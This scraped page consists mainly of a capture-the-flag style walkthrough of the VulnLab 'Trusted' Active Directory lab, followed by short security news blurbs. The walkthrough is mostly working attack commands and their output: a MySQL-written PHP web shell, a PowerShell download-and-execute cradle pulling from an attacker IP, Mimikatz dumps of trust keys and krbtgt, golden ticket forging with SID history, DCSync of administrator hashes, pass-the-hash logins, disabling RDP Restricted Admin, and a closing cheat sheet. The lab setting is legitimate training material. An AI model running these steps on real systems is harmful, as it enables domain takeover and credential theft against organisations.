lab.trusted.vl\rsmith:IHateEric2 SMB 10.10.231.182 445 LABDC [*] Enumerated sharesSMB 10.10.231.182 445 LABDC Share Permissions RemarkSMB 10.10.231.182 445 LABDC ----- ----------- ------SMB 10.10.231.182 445 LABDC ADMIN$ Remote AdminSMB 10.10.231.182 445 LABDC C$ Default shareSMB 10.10.231.182 445 LABDC IPC$ READ Remote IPCSMB 10.10.231.182 445 LABDC NETLOGON READ Logon server share SMB 10.10.231.182 445 LABDC SYSVOL READ Logon server share This is one way to get initial access, but I didn’t use this method. Instead, I got RCE through LFI, performed DCSync, grabbed the administrator’s hashes, and started the machine from there.Method 2: MySQL to RCE — Dropping a Web ShellSince the MySQL port is open and the database is running as root, we can use the phpinfo file to drop a web shell in the /dev directory and get RCE.select ''<?php echo "command: " . system($_REQUEST["cmd"]); ?>'' into outfile "C:\\xampp\\htdocs\\dev\\shell.php";cmd=powershell.exe -nop -w hidden -ep bypass -c IEX(New-Object Net.WebClient).DownloadString(''http://10.8.5.124/shell.php'');By creating a reverse shell, then starting a Python server and setting up a listener, we successfully get our shell. Now, it’s time to hunt for passwords as part of Windows privilege escalation. The best script for this is LaZagne, which helps retrieve passwords and hashes. 🔥You’ll get the administrator’s hash using LaZagne, and if you want more, you can retrieve additional hashes with impacket-secretdump. After validating the hash, it works! Now, I’ll use PS Remote, but as I mentioned before, always validate the hash against multiple services like MSSQL, SMB, WinRM, RDP, and so on.WinRM works fine, but RDP doesn’t — so I bypassed Restricted Mode on RDP and logged in successfully! 🔥😈┌──(root㉿kali)-[/home/kali/VulnLab/Trusted] └─# evil-winrm -i 10.10.231.182 -u Administrator -H ''75878369ad33f35b7070ca854100bc07'' Evil-WinRM shell v3.5 Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion Info: Establishing connection to remote endpoint ^[[A^[[A^[[A^[[A^[[A^[[A*Evil-WinRM* PS C:\Users\Administrator\Documents> *Evil-WinRM* PS C:\Users\Administrator\Documents> ls *Evil-WinRM* PS C:\Users\Administrator\Documents> cd ../Desktop *Evil-WinRM* PS C:\Users\Administrator\Desktop> ls Directory: C:\Users\Administrator\Desktop Mode LastWriteTime Length Name ---- ------------- ------ ---- -a---- 9/14/2022 3:33 PM 36 User.txt *Evil-WinRM* PS C:\Users\Administrator\Desktop> cat user.txt VL{349efd4b1ccbeb4d3ca0108fa5cc5802} *Evil-WinRM* PS C:\Users\Administrator\Desktop> reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /fThe operation completed successfully. Restricted Admin Mode on RDPSo, I bypassed that, as you can see in the Evil-WinRM session’s last command… and here we go!I like thatGot it, brother! This is the real deal now — the most important stage of the machine. Forget the initial access, that was just a warm-up. Now, this is where the magic happens! 🔥But first, you want me to check out Will Schroeder’s talk — which one are you referring to? His stuff on Active Directory, trust abuse, or Kerberos attacks? Let me know, and I’ll sync up with what you’re thinking!https://medium.com/media/809319a3ec549a03da80242940a03083/hrefhttps://medium.com/media/61999eb8353bb5cf71fb133b4a8011bb/href📌Let the war begin with the Trust Attack!Enumeration Phase: Mapping the Battlefield 🔍🔥After opening the RDP session, I launched Administrator PowerShell, imported the Active Directory module, and started enumerating users, trusts, forests, and more. This stage usually takes some time, so I’ll be making a separate blog post focused on post-initial access enumeration in Active Directory.Trust Enumeration: Unraveling the AD RelationshipsPS C:\Users\Administrator> Get-ADTrust -Filter *Direction : BiDirectionalDisallowTransivity : FalseDistinguishedName : CN=trusted.vl,CN=System,DC=lab,DC=trusted,DC=vlForestTransitive : FalseIntraForest : TrueIsTreeParent : FalseIsTreeRoot : FalseName : trusted.vlObjectClass : trustedDomainObjectGUID : c8005918-3c50-4c33-bcaa-90c76f46561cSelectiveAuthentication : FalseSIDFilteringForestAware : FalseSIDFilteringQuarantined : FalseSource : DC=lab,DC=trusted,DC=vlTarget : trusted.vlTGTDelegation : FalseTrustAttributes : 32TrustedPolicy :TrustingPolicy :TrustType : UplevelUplevelOnly : FalseUsesAESKeys : FalseUsesRC4Encryption : FalsePS C:\Users\Administrator>With that command, we now know that lab.trusted.vl has a Bi-Directional Trust with trusted.vl. But honestly, I already knew that before enumerating in RDP — because I uploaded SharpHound, ran it, and got the results right away!Now I will perform the SID History Attack, as mentioned in the talk I referenced earlier.I uploaded Mimikatz by running a Python server and then transferred it from my attacker machine to the RDP session using this command:Invoke-WebRequest -Uri "http://10.8.5.124/mimi.exe" -OutFile "C:\Users\Administrator\Documents\mimi.exe"First step: Dumping trust secrets using this Mimikatz module:PS C:\Users\Administrator\Documents> ./mimi.exe "lsadump::trust /patch" "exit" .#####. mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08 .## ^ ##. "A La Vie, A L''Amour" - (oe.eo) ## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) ## \ / ## > https://blog.gentilkiwi.com/mimikatz ''## v ##'' Vincent LE TOUX ( vincent.letoux@gmail.com ) ''#####'' > https://pingcastle.com / https://mysmartlogon.com ***/mimikatz(commandline) # lsadump::trust /patchCurrent domain: LAB.TRUSTED.VL (LAB / S-1-5-21-2241985869-2159962460-1278545866)Domain: TRUSTED.VL (TRUSTED / S-1-5-21-3576695518-347000760-3731839591) [ In ] LAB.TRUSTED.VL -> TRUSTED.VL * 2/15/2025 6:47:42 PM - CLEAR - ad 4a 9a 08 93 2b 62 f1 5a d7 df 25 a6 3c da 9c b1 a7 8a 2f 7f e4 04 fe 21 0a a0 5a 36 af 51 4e 56 4e 2b c6 be 17 b3 68 de 96 04 62 b0 c5 e0 a0 e8 90 22 65 f4 12 86 3f da 2b cb d7 34 f9 9e ad 53 d5 bb 81 96 07 8e 1b 94 3a c4 9c 8a 62 58 dc 55 76 36 b7 77 a4 a8 33 58 50 e4 b9 58 ed 63 21 60 b3 d5 48 c9 16 5d 96 88 52 04 e2 63 18 54 86 3a 14 7d 92 5c 62 99 bf e9 27 bc 93 37 e6 da 6c 1e b0 f3 e6 79 43 85 b3 af 90 6a 38 ec ef 6c a5 0d e2 f5 28 68 5a 0d e2 bd 84 3e d7 21 a3 b6 8b ff 57 d4 b4 6b a7 70 4a a2 e3 f1 25 d7 83 69 20 9a 77 a2 71 3d 1a f8 c6 f0 fb 3f ed 0c 63 5f 37 3a 47 5f 9e 60 0d 87 f7 52 5c 20 e3 a6 a0 60 37 6f 7b 3d 24 c1 01 1f e9 32 15 39 f8 9c 99 22 60 0e 9a 79 c8 c8 38 cd dc ec 5b f4 91 bc 62 64 8b * aes256_hmac 7d52770f3e1d54f3e5283b275eca8ccd90d53244175dcf751ebd2f465af038c8 * aes128_hmac 4882ff6bf62aefaa071edeb824ee0612 * rc4_hmac_nt 29dcfffd25cf0e36b487a9c4bd465319 [ Out ] TRUSTED.VL -> LAB.TRUSTED.VL * 2/15/2025 7:02:42 PM - CLEAR - 9b ca d0 cd 75 16 60 8e 18 49 33 bf d9 17 e0 23 97 f5 b8 39 b6 24 e8 84 23 30 04 d3 57 4d 36 40 23 44 30 13 8e 5b eb 7c a6 5c 01 b6 49 85 4c 73 86 13 6b 8a d3 df 19 03 c5 5b b2 a6 bc 6c e5 cf ae 97 d8 87 bc 54 35 d4 f5 71 b6 28 5b ff 55 16 32 63 21 78 35 fb c7 b5 85 61 f7 df df 32 a8 6c 75 a9 dd 30 33 90 f2 81 b5 4f 75 61 e8 4c 76 d1 90 48 b2 45 dd 11 dc d0 3c 5e 17 a7 35 4f 8e db df 83 3c 5f 6e dd e9 e1 ac 17 90 53 58 ab cb 48 ac e1 cf 71 5d e7 12 c0 b8 3d c6 3f 25 56 10 e5 49 4b b0 d1 1b ff 72 3f 78 a8 f0 67 97 e1 fa 98 e7 91 7a fa 1e 49 9e 52 53 af a7 4e 0c 94 e4 6b 0f db c7 01 5f 07 73 f2 63 cf 74 fc 32 a7 02 f8 9c 8f d6 85 16 09 f5 27 7a a0 64 aa 64 9b f3 e8 e4 fd 28 2f 64 ec f8 85 7b 88 01 7f 3e 33 53 38 * aes256_hmac 94276ee51327110295ce9d03547c203d08db16b8385fc3391c2b599f44803f8d * aes128_hmac bf84dbf7d0b72a5d26156ba6a5c33671 * rc4_hmac_nt aba63a11ab05b2765b2b81d0910bbc15 [ In-1] LAB.TRUSTED.VL -> TRUSTED.VL * 5/27/2023 4:19:25 PM - CLEAR - ea 31 66 22 35 93 0e ef 05 dd e5 94 f0 70 b5 dd 2c de b4 ec 7a 47 73 ae 20 45 15 00 9c 0c 1a 7e 9a f4 68 c7 22 c9 d2 35 cb 67 bb 8d 56 7e 5b 9f 4e 9c b4 4c 77 a6 b7 41 2e d9 3d e4 87 73 5b ee 44 8b 4f 3f f3 e8 ac 32 21 08 db 79 9a 55 2b a0 6f c2 dd 69 c6 9a b7 4d e1 8a 4c f6 e8 0b 47 a9 cb cf 4d 6f 14 8c 28 44 66 63 85 20 13 3b c8 93 bd 20 38 ff 6c 73 d3 2a 61 a3 10 fc 2f d5 af 29 a8 5b 28 09 0d 1f 17 46 8d 7d 09 fa e8 55 61 2e d7 6b 3a 70 38 11 e0 42 08 4b 5b 2b be 53 2c 62 97 64 42 4e 11 fb 50 ed 2f ef 58 38 be 20 a4 4b f6 cf a7 45 18 73 56 be cd 6c 0a 78 16 f7 51 ae 82 59 95 7a 33 f0 27 a6 6d 08 62 ca 74 5f 82 13 c2 d2 aa 7b 12 96 b8 16 27 2e ee 48 bd e4 21 41 db a2 e2 92 ca f3 5d d6 76 cc b5 66 28 2a 87 92 * aes256_hmac a7880265164670ddfc041c250bdf7d8166bf8ca0c06d86c3ddec12620fdfb800 * aes128_hmac 9d59311c51bd3eb6cc846cf1af53c80f * rc4_hmac_nt fdb9239325aed982da5f521116ffbcaf [Out-1] TRUSTED.VL -> LAB.TRUSTED.VL * 2/15/2025 7:02:42 PM - CLEAR - 7a 6f b9 f0 49 87 53 be 90 63 63 9c d9 8e 15 f5 ce b5 60 98 6d e6 08 0f 7b ab 3a 7b e3 59 48 a4 f4 6e 6f 1a cc 87 f2 19 81 9a 3b e5 f6 b0 59 28 ad 97 e2 fd fb 39 f8 15 98 ca 4e a9 c4 04 60 15 6a ca 97 0e 20 81 77 42 ac c0 c9 0d 4f 49 4d 64 ee 2a 0f ed aa 4c f3 5b fb 51 ef 50 1a 84 5d 15 a8 9c ce a5 37 a7 02 47 ff 67 0d 1a 59 1c f6 c9 11 9f a2 55 7f c0 45 db 29 77 db 54 9e 46 23 ea 60 a3 9d 9c 11 61 44 51 d2 3f 32 cc e3 67 95 1c a5 0a 0f c6 96 3d e2 a3 53 2b 92 41 a2 a2 46 9e 27 65 c4 84 b0 6f 6e 4e 95 70 0e ed a6 a9 8e 1b ac 66 e8 40 61 9f 6e 70 44 6e b1 fc dd a7 72 9d 3e bd ac b7 0e b9 6b 3c a6 b5 a0 d2 9b 74 91 39 02 f8 7c 31 16 09 7c 52 f3 e9 00 3e 0c 88 46 a3 05 c6 5c 2b f9 3c 0c 21 bd b2 04 8b bc 8a b0 74 * aes256_hmac bfc64ba951d28743ef247deb0fa7d69197b9fda301c64ae0765ba9c5c6418183 * aes128_hmac 0fe86c75c4b6686fcae0bd01d0a1fa2c * rc4_hmac_nt cddbd971c2e3e4ef64b4eb024e4e75c0mimikatz(commandline) # exitBye!PS C:\Users\Administrator\Documents>2. Second step: Retrieving the Domain SID using this command:PS C:\Users\Administrator\Documents> whoami /userUSER INFORMATION----------------User Name SID================= =============================================lab\administrator S-1-5-21-2241985869-2159962460-1278545866-500PS C:\Users\Administrator\Documents>3. Third step: Retrieving the SID of the Enterprise Admin using this command:PS C:\Users\Administrator\Documents> get-adgroup -Filter {name -eq "Enterprise Admins"} -Server trusted.vlDistinguishedName : CN=Enterprise Admins,CN=Users,DC=trusted,DC=vlGroupCategory : SecurityGroupScope : UniversalName : Enterprise AdminsObjectClass : groupObjectGUID : 9e72548e-1fda-486c-b426-6bcb7f171253SamAccountName : Enterprise AdminsSID : S-1-5-21-3576695518-347000760-3731839591-519PS C:\Users\Administrator\Documents>4. Fourth step: Dumping krbtgt because this attack is basically like a Golden Ticket, but even better… Golden is now more golden! 🎫🔥PS C:\Users\Administrator\Documents> .\mimi.exe "privilege::debug" "lsadump::lsa /patch /user:krbtgt" "exit" .#####. mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08 .## ^ ##. "A La Vie, A L''Amour" - (oe.eo) ## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) ## \ / ## > https://blog.gentilkiwi.com/mimikatz ''## v ##'' Vincent LE TOUX ( vincent.letoux@gmail.com ) ''#####'' > https://pingcastle.com / https://mysmartlogon.com ***/mimikatz(commandline) # privilege::debugPrivilege ''20'' OKmimikatz(commandline) # lsadump::lsa /patch /user:krbtgtDomain : LAB / S-1-5-21-2241985869-2159962460-1278545866RID : 000001f6 (502)User : krbtgtLM :NTLM : c7a03c565c68c6fac5f8913fab576ebdmimikatz(commandline) # exitBye!PS C:\Users\Administrator\Documents>5. Fifth step: Now, let’s fire up the attack and take over!PS C:\Users\Administrator\Documents> .\mimi.exe "privilege::debug" "kerberos::golden /user:Administrator /krbtgt:c7a03c565c68c6fac5f8913fab576ebd /domain:lab.trusted.vl /sid:S-1-5-21-2241985869-2159962460-1278545866 /sids:S-1-5-21-3576695518-347000760-3731839591-519 /ticket:C:\Users\Administrator\Documents\ticket.kirbi" "exit" .#####. mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08 .## ^ ##. "A La Vie, A L''Amour" - (oe.eo) ## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) ## \ / ## > https://blog.gentilkiwi.com/mimikatz ''## v ##'' Vincent LE TOUX ( vincent.letoux@gmail.com ) ''#####'' > https://pingcastle.com / https://mysmartlogon.com ***/mimikatz(commandline) # privilege::debugPrivilege ''20'' OKmimikatz(commandline) # kerberos::golden /user:Administrator /krbtgt:c7a03c565c68c6fac5f8913fab576ebd /domain:lab.trusted.vl /sid:S-1-5-21-2241985869-2159962460-1278545866 /sids:S-1-5-21-3576695518-347000760-3731839591-519 /ticket:C:\Users\Administrator\Documents\ticket.kirbiUser : AdministratorDomain : lab.trusted.vl (LAB)SID : S-1-5-21-2241985869-2159962460-1278545866User Id : 500Groups Id : *513 512 520 518 519Extra SIDs: S-1-5-21-3576695518-347000760-3731839591-519 ;ServiceKey: c7a03c565c68c6fac5f8913fab576ebd - rc4_hmac_ntLifetime : 2/15/2025 8:47:36 PM ; 2/13/2035 8:47:36 PM ; 2/13/2035 8:47:36 PM-> Ticket : C:\Users\Administrator\Documents\ticket.kirbi * PAC generated * PAC signed * EncTicketPart generated * EncTicketPart encrypted * KrbCred generatedFinal Ticket Saved to file !mimikatz(commandline) # exitBye!PS C:\Users\Administrator\Documents>Now, let’s pass the ticket to inject our forged ticket into the session. After that, we’ll perform DCSync, dump the Administrator’s hash, and log in like a bossPS C:\Users\Administrator\Documents> .\mimi.exe "privilege::debug" "kerberos::ptt C:\users\administrator\documents\ticket.kirbi" "lsadump::dcsync /domain:trusted.vl /dc:trusteddc.trusted.vl /user:S-1-5-21-3576695518-347000760-3731839591-500" "exit" .#####. mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08 .## ^ ##. "A La Vie, A L''Amour" - (oe.eo) ## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) ## \ / ## > https://blog.gentilkiwi.com/mimikatz ''## v ##'' Vincent LE TOUX ( vincent.letoux@gmail.com ) ''#####'' > https://pingcastle.com / https://mysmartlogon.com ***/mimikatz(commandline) # privilege::debugPrivilege ''20'' OKmimikatz(commandline) # kerberos::ptt C:\users\administrator\documents\ticket.kirbi* File: ''C:\users\administrator\documents\ticket.kirbi'': OKmimikatz(commandline) # lsadump::dcsync /domain:trusted.vl /dc:trusteddc.trusted.vl /user:S-1-5-21-3576695518-347000760-3731839591-500[DC] ''trusted.vl'' will be the domain[DC] ''trusteddc.trusted.vl'' will be the DC server[DC] ''S-1-5-21-3576695518-347000760-3731839591-500'' will be the user account[rpc] Service : ldap[rpc] AuthnSvc : GSS_NEGOTIATE (9)Object RDN : Administrator** SAM ACCOUNT **SAM Username : AdministratorAccount Type : 30000000 ( USER_OBJECT )User Account Control : 00010200 ( NORMAL_ACCOUNT DONT_EXPIRE_PASSWD )Account expiration : 1/1/1601 12:00:00 AMPassword last change : 9/18/2022 8:50:53 PMObject Security ID : S-1-5-21-3576695518-347000760-3731839591-500Object Relative ID : 500Credentials: Hash NTLM: 15db914be1e6a896e7692f608a9d72ef ntlm- 0: 15db914be1e6a896e7692f608a9d72ef ntlm- 1: 86a9ee70dfd64d20992283dc5721b475 lm - 0: 1a28b083f0e83167bec07d185d492a67Supplemental Credentials:* Primary:NTLM-Strong-NTOWF * Random Value : 7ad3ac096b425259c12c6cade75241c9* Primary:Kerberos-Newer-Keys * Default Salt : TRUSTED.VLAdministrator Default Iterations : 4096 Credentials aes256_hmac (4096) : d75ec7df1acac724a6dfc250e707aab3492b6d9936b9898f742781b0a871d4a6 aes128_hmac (4096) : 1cee32af6e8cd27059d855e6c6b4d5ec des_cbc_md5 (4096) : aed5e385512c685e OldCredentials aes256_hmac (4096) : 11b39019ac5f9715327f55a1b44820da82e32b14ce2dd40f142192f4eeab1336 aes128_hmac (4096) : c88a36f9c11a83c13a03f3d48aae78a4 des_cbc_md5 (4096) : 2fe99be0a82c49d0 OlderCredentials aes256_hmac (4096) : c88291723e622259b4a930eec2c087348c258a09d5720fdb11625fd6432057f8 aes128_hmac (4096) : c803feb47873e961875882b3909edd2b des_cbc_md5 (4096) : 292ab5329be9ce40* Primary:Kerberos * Default Salt : TRUSTED.VLAdministrator Credentials des_cbc_md5 : aed5e385512c685e OldCredentials des_cbc_md5 : 2fe99be0a82c49d0* Packages * NTLM-Strong-NTOWF* Primary:WDigest * 01 78a97cd0944c04736ebc5c6a41151044 02 9f038aad902811d760f8ab1870ec8817 03 8b69a5557480678e214f7fcf8a1b5299 04 78a97cd0944c04736ebc5c6a41151044 05 a02112deac62e4ac6f5ae005e80dca33 06 524fdfa5abe0491f80ea30779ccc4673 07 b8c416ff7f3b06308bdb914e5e974489 08 01e3d6cffddd4bd9e9b6ae361e226569 09 2d423b7e046d43c0e78e19f1d2cf3788 10 98014f1215b902e6215f97ec52ba4915 11 762701fd0c34e1f70c11fdb4378e9d3d 12 01e3d6cffddd4bd9e9b6ae361e226569 13 61f7063f23adab72b60fded48fbf2854 14 d5c36527291c60a7ccd2fa4f214f36cc 15 553607358db97eb65e234bf8aeb52e8d 16 a8d4e1e3131446e6d000597a03727854 17 dbf6bf6fad3583eb2bc387a540a3cf68 18 fe8bb83ce7236f88c86ee1f56cb198bd 19 b0bdc788c9df34f4d7b0ae9ecb970cc0 20 df0e59fd58ada70c2c61de837652a72f 21 035f102a7c5c5159054e450924b0a326 22 0f8c9e30d9e9066376e868dc60178b7f 23 c65977b340f78e2a1ff601035748959b 24 4a3f6237a32c525029e3d2cf0cc4f51d 25 7791924095599f3112d1156fa93e65c2 26 c8377915d36d8bdd86925c1da86ebe04 27 655f04c5a10c8045ec789ae964093ccf 28 7e1eee2805079de9885d2c2957285a6e 29 c10f5a9d43d4cc149bed1e98df67d560mimikatz(commandline) # exitBye!PS C:\Users\Administrator\Documents>Root flag┌──(root㉿kali)-[/home/kali/VulnLab/Trusted] └─# evil-winrm -i 10.10.231.181 -u administrator -H 15db914be1e6a896e7692f608a9d72ef Evil-WinRM shell v3.5 Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\Administrator\Documents> [System.IO.File]::GetAttributes("C:\Users\Administrator\Desktop\root.txt").ToString().Contains("Encrypted") True *Evil-WinRM* PS C:\Users\Administrator\Documents> CIPHER /u /n Encrypted File(s) on your system: C:\Documents and Settings\Administrator\Desktop\root.txt C:\Users\Administrator\Desktop\root.txt ls *Evil-WinRM* PS C:\Users\Administrator\Documents> *Evil-WinRM* PS C:\Users\Administrator\Documents> cat *Evil-WinRM* PS C:\Users\Administrator\Documents> ls root*Evil-WinRM* PS C:\Users\Administrator\Documen cat root.txt Cannot find path ''C:\Users\Administrator\Documents\root.txt'' because it does not exist. At line:1 char:2 + cat root.txt + ~~~~~~~~~~~~ + CategoryInfo : ObjectNotFound: (C:\Users\Admini...uments\root.txt:String) [Get-Content], ItemNotFoundException + FullyQualifiedErrorId : PathNotFound,Microsoft.PowerShell.Commands.GetContentCommand *Evil-WinRM* PS C:\Users\Administrator\Documents> upload RunasCs.exe *Evil-WinRM* PS C:\Users\Administrator\Documents> .\RunasCs.exe administrator "Password!1234" "cmd.exe /c type C:\Users\Administrator\Desktop\root.txt"VL{1f-----------------------------}*Evil-WinRM* PS C:\Users\Administrator\Documents> Mini Cheatsheet for All Commands After Getting into RDP# 1. Import Active Directory moduleImport-Module ActiveDirectory# 2. Enumerate users in the domainGet-ADUser -Filter * -Properties *# 3. Enumerate trustsGet-ADTrust# 4. Dumping Trust Secrets with Mimikatzmimikatz.exe "privilege::debug" "lsadump::trust"# 5. Retrieve Domain SIDwmic useraccount get name,sid# 6. Retrieve SID of Enterprise AdminGet-ADGroup -Filter {Name -eq "Enterprise Admins"}# 7. Dump krbtgt for Golden Ticket attackmimikatz.exe "lsadump::dcsync /user:krbtgt"# 8. Pass the ticket to inject into the sessionmimikatz.exe "kerberos::ptt <ticket_file>"# 9. Perform DCSync to dump hashesmimikatz.exe "lsadump::dcsync /user:<username>"Demo for the Same Attack on Trusted MachineDemo for the same attack on the Trusted machineRecap: Conquering the Trusted MachineTo sum it all up, this journey started with initial access via web app fuzzing and LFI, leading us to RCE. From there, we went on to enumerate Active Directory, focusing on trust relationships. By leveraging tools like SharpHound, we mapped out the bi-directional trust between domains and dug deep into SID History attacks.We then uploaded Mimikatz, dumped the krbtgt account, and performed DCSync to retrieve hashes. After validating the hashes across services like WinRM and RDP, we bypassed Restricted Mode on RDP and gained access. Finally, we executed the Golden Ticket attack, allowing us to escalate privileges and dump the Administrator hash.Root flag obtained — mission accomplished!Remember: Trust attacks are your best friends in environments with weak domain configurations. Keep your enumeration clean and methodical, and you’ll find the weak spots that lead to total domination.Do You Wanna Chat with Maverick?🥂Don’t forget to follow me on LinkedIn and Twitter, and give me some respect on Hack The Box! i love chatting with like-minded people, sharing knowledge, and learning from everyone. Happy hacking! 🚀ReferencesАтаки на трасты между доменамиAttacking Active Directory | s0cm0nkey''s Security Reference GuideFrom Domain Admin to Enterprise Admin | Red Team NotesIt''s All About Trust - Forging Kerberos Trust Tickets to Spoof Access across Active Directory TrustsKerberos Golden Tickets are Now More GoldenTrusts | The Hacker Recipes“These tools and techniques were instrumental in demonstrating the power of trust abuse and Active Directory exploitation, showcasing common tactics used in real-world red team engagements.”Maverick just pwned Trusted @ Vulnlab!VulnLab Trusted | Maverick Got Your Trusted Baby😉 was originally published in InfoSec Write-ups on Medium, where people are continuing the conversation by highlighting and responding to this story.

by InfoSec Write-ups

by ReliaQuest

IntroductionContinue reading on InfoSec Write-ups »

by InfoSec Write-ups

In this blog, we cover the biggest international laws and standards security leaders should know about in 2025.

by Hack The Box Blog

by CrowdStrike

<p>Are you interested in incorporating Large Language Models (LLMs) into app tests yet lack the tooling to get you there? This blog walks through how to start using effective LLM attacks today.</p>

by TrustedSec

PAN-OS auth bypass (@hash_kitten), Outlook drafts as C2 (@elasticseclabs), Ludus powered SocGholish analysis (@RussianPanda9xx), kernel UAF (@h0mbre_), and more!

by Bad Sector Labs

Researchers earned a $50,500 Bug Bounty after uncovering a critical supply chain flaw in a newly acquired firm,…

by Hackread

Microsoft said it has discovered a new variant of a known Apple macOS malware called XCSSET as part of limited attacks in the wild. ""Its first known variant since 2022, this latest XCSSET malware features enhanced obfuscation methods, updated persistence mechanisms, and new infection strategies,"" the Microsoft Threat Intelligence team said in a post shared on X. ""These enhanced features add to

by The Hacker News

Dutch police seized 127 servers of the bulletproof hosting service Zservers/XHost after government sanctions. On February 11, 2025, the US, UK, and Australia sanctioned a Russian bulletproof hosting services provider and two Russian administrators because they supported Russian ransomware LockBit operations. Alexander Igorevich Mishin and Aleksandr Sergeyevich Bolshakov are the two Russian nationals and administrators of Zservers. […]

by Security Affairs

People around the world learned about the latest advancements in the American space industry! This was made possible…

by Hackread

Netskope Threat Labs researchers discovered a Golang-based backdoor using Telegram for C2 communication, possibly of Russian origin. Netskope Threat Labs found a Golang-based backdoor using Telegram for C2. The malware, still in development but functional, exploits cloud apps to evade detection. The experts believe the new Go backdoor could have a Russian origin. Upon executing […]

by Security Affairs

A nostalgic piece of computing history has been brought back to life, and this time, it''s interactive. A developer known as “x86matthew” has turned the classic Windows 9x 3D Maze screensaver into a fully playable game. The project, which was shared in a tweet over the weekend, is a re-engineered version of the original screensaver, … The post Windows’ Classic 3D Maze Screensaver Revived as Playable Game appeared first on CyberInsider.

by Cyber Insider

Explore industry moves and significant changes in the industry for the week of February 17, 2025. Stay updated with the latest industry trends and shifts.

by SecurityWeek

X (formerly Twitter) has begun blocking links to Signal.me, a domain used by the encrypted messaging platform Signal to facilitate direct user contact. The restriction applies to public posts, direct messages, and even user bios, triggering various error messages when users attempt to share a Signal.me link. Existing links now display a warning page labeling … The post X Blocks Signal.me Links Citing Security Concerns appeared first on CyberInsider.

by Cyber Insider

The Pentesting Pastor, Hunting for DOMPurify Misconfigurations, Hack Like a Pirate, Google AI Studio Walkthrough, Speak at 92 Beats Per Minute

by Hive Five

South Korea has formally suspended new downloads of Chinese artificial intelligence (AI) chatbot DeepSeek in the country until the service makes changes to its mobile apps to comply with data protection regulations. Downloads have been paused as of February 15, 2025, 6:00 p.m. local time, the Personal Information Protection Commission (PIPC) said in a statement. The web service remains

by The Hacker News

Cyber threats evolve—has your defense strategy kept up? A new free guide available here explains why Continuous Threat Exposure Management (CTEM) is the smart approach for proactive cybersecurity. This concise report makes a clear business case for why CTEM’s comprehensive approach is the best overall strategy for shoring up a business’s cyber defenses in the face of evolving attacks. It also

by The Hacker News

Hudson Rock has exposed widespread infostealer malware infections affecting employees in the U.S. military, government agencies, and major defense contractors. The findings reveal that compromised credentials — available for as little as $10 on cybercrime marketplaces — could be exploited to gain unauthorized access to classified networks, VPNs, email systems, and development tools. Hudson Rock’s … The post U.S. Military and Defense Contractors Hit by Infostealer Malware appeared first on CyberInsider.

by Cyber Insider

In December 2024, the United Arab Emirates (UAE) emerged as one of the most targeted nations for malware attacks, according to Acronis'' latest Cyberthreats Report. The report highlights a 197% surge in email-based cyberattacks globally during the second half of 2024 compared to the same period in 2023. The post UAE Among Most Targeted Countries by Malware Attacks appeared first on ZENDATA Cybersecurity.

by Zendata

JPMorgan Chase Bank (Chase) will soon start blocking Zelle payments to social media contacts to combat a significant rise in online scams utilizing the service for fraud. [...]

by BleepingComputer

Welcome to this week’s Cybersecurity News Recap. Discover how cyber attackers are using clever tricks like fake codes and sneaky emails to gain access to sensitive data. We cover everything from device code phishing to cloud exploits, breaking down the technical details into simple, easy-to-follow insights. ⚡ Threat of the Week Russian Threat Actors Leverage Device Code Phishing to Hack

by The Hacker News

The new Golang backdoor uses Telegram for command and control. Netskope discovers malware that exploits Telegram’s API for…

by Hackread

Cloud-based platforms and AI-driven services continue to remain in the crosshairs of rapidly evolving malware. Recently, Microsoft released a security advisory addressing two critical vulnerabilities affecting Azure AI Face Service (CVE-2025-21415) and Microsoft Account (CVE-2025-21396). These flaws could allow attackers to escalate privileges under specific conditions, leading to unauthorized access and system compromise. Given the increasing reliance on AI and cloud technologies, understanding these vulnerabilities and their implications is crucial for organizations and security professionals. Overview of the Vulnerabilities Microsoft identified and patched two security vulnerabilities that could have led to privilege escalation: 1. CVE-2025-21396 (Microsoft Account Elevation of Privilege Vulnerability) Severity Score: 7.5 (CVSS) Cause: Missing authorization checks in Microsoft Accounts. Risk: An unauthorized attacker could exploit this flaw to elevate privileges over a network. Discovery: Reported by security researcher Sugobet. 2. CVE-2025-21415 (Azure AI Face Service Elevation of Privilege Vulnerability) Severity Score: 9.9 (CVSS) Cause: Authentication bypass via spoofing in Azure AI Face Service. Risk: An authorized attacker could leverage this flaw to gain elevated privileges over a network. Discovery: Reported by an anonymous researcher. The existence of a proof-of-concept (PoC) exploit, confirming its potential exploitability, further emphasizes the critical nature of CVE-2025-21415. Potential Impact of These Vulnerabilities Exploiting these vulnerabilities could allow attackers to: Gain unauthorized access to Microsoft Account services. Escalate privileges within Azure AI Face Service, potentially compromising sensitive data. Bypass authentication measures and executes malicious activities. Conduct large-scale attacks on cloud-based services. Given the severity of these vulnerabilities, organizations using Azure AI and Microsoft Account services must understand the risks and take necessary precautions. Microsoft’s Response and Mitigation Efforts Microsoft has fully mitigated these vulnerabilities, ensuring that they no longer pose a risk to users. The company confirmed that: No customer action is required as patches have been applied directly to the affected services. The vulnerabilities were addressed in accordance with security best practices. Transparency remains a priority, ensuring users are aware of cybersecurity risks and mitigations. Microsoft emphasized the importance of transparency in cloud security, stating: “By openly sharing information about vulnerabilities that are discovered and resolved, we enable Microsoft and our partners to learn and improve. This collaborative effort contributes to the safety and resilience of our critical infrastructure.” Why This Matters for Cloud Security The discovery and mitigation of these vulnerabilities underscore critical issues in cloud security: Growing Target on Cloud-Based AI Services – Attackers are increasingly targeting AI-driven platforms, making security patches vital. Privilege Escalation Risks – Gaining elevated privileges can lead to unauthorized access to critical systems and data breaches. PoC 